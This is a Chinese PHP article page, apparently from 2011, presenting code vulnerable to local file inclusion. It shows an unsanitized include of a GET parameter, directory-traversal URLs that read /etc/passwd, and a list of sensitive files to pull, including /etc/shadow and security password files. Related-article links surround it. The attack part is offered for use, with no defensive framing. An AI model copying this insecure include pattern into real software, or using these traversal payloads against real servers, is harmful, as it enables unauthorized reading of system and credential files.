编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

一个ftp类（ini.php）

Oct 09 PHP

使用PHP批量生成随机用户名

Jul 10 PHP

PHP错误提示的关闭方法详解

Jun 23 PHP

php函数间的参数传递(值传递/引用传递)

Sep 23 PHP

微信营销平台系统?刮刮乐的开发

Jun 10 PHP

PHP return语句另类用法不止是在函数中

Sep 17 PHP

php验证码的制作思路和实现方法

Nov 12 PHP

Zend Framework教程之Zend_Db_Table表关联实例详解

Mar 23 PHP

PHP获取指定时间段之间的年,月,天,时,分,秒

Jun 05 PHP

PHP实现git部署的方法教程

Dec 19 PHP

PHP5.5新特性之yield理解与用法实例分析

Jan 11 PHP

thinkphp3.2同时连接两个数据库的简单方法

Aug 13 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

字符串(2) Xception(1) ResNet50(1) 内存泄露(1) Spring(9) Seaborn(1) Inception(2) yolo3(1) tensorflow(2) PostMapping(1)

You might like

php 文件夹删除、php清除缓存程序

2009/08/25 PHP

自己在做项目过程中学到的PHP知识收集

2012/08/20 PHP

php修改NetBeans默认字体的大小

2013/07/02 PHP

javascript下给元素添加事件的方法与代码

2007/08/13 Javascript

javascript 简练的几个函数

2009/08/29 Javascript

jquery操作 iframe的方法

2014/12/03 Javascript

JavaScript中的setMilliseconds()方法使用详解

2015/06/11 Javascript

jquery Easyui快速开发总结

2015/08/20 Javascript

javascript中apply、call和bind的使用区别

2016/04/05 Javascript

bootstrap输入框组代码分享

2016/06/07 Javascript

JS基础随笔(菜鸟必看篇)

2016/07/13 Javascript

浅谈JavaScript的函数及作用域

2016/12/30 Javascript

vue中实现图片和文件上传的示例代码

2018/03/16 Javascript

vue与原生app的对接交互的方法(混合开发)

2018/11/28 Javascript

vue车牌号校验和银行校验实战

2019/01/23 Javascript

详解json串反转义（消除反斜杠）

2019/08/12 Javascript

Node.js API详解之 readline模块用法详解

2020/05/22 Javascript

[01:06:07]2014 DOTA2国际邀请赛中国区预选赛5.21 DT VS CIS

2014/05/22 DOTA

[02:05]2014DOTA2西雅图邀请赛专访啸天mik夫妻档

2014/07/08 DOTA

使用sklearn进行对数据标准化、归一化以及将数据还原的方法

2018/07/11 Python

python使用xlrd模块读取xlsx文件中的ip方法

2019/01/11 Python

Python使用修饰器进行异常日志记录操作示例

2019/03/19 Python

TensorFlow绘制loss/accuracy曲线的实例

2020/01/21 Python

pycharm 实现本地写代码,服务器运行的操作

2020/06/08 Python

波兰家居饰品和厨房配件网上商店：Maleomi

2020/12/15 全球购物

物业招聘计划书

2014/01/10 职场文书

大学生职业规划范文：象牙塔生活的四年计划

2014/01/14 职场文书

爱岗敬业演讲稿范文

2014/01/14 职场文书

论群众路线学习心得体会

2014/10/31 职场文书

2015年超市员工工作总结

2015/05/04 职场文书

债务纠纷起诉书

2015/05/20 职场文书

培训班开班主持词

2015/07/02 职场文书

2016年5月份红领巾广播稿

2015/12/21 职场文书

合同范本之电脑出租

2019/08/13 职场文书

python自动化之如何利用allure生成测试报告

2021/05/02 Python

Spring mvc是如何实现与数据库的前后端的连接操作的?

2021/06/30 Java/Android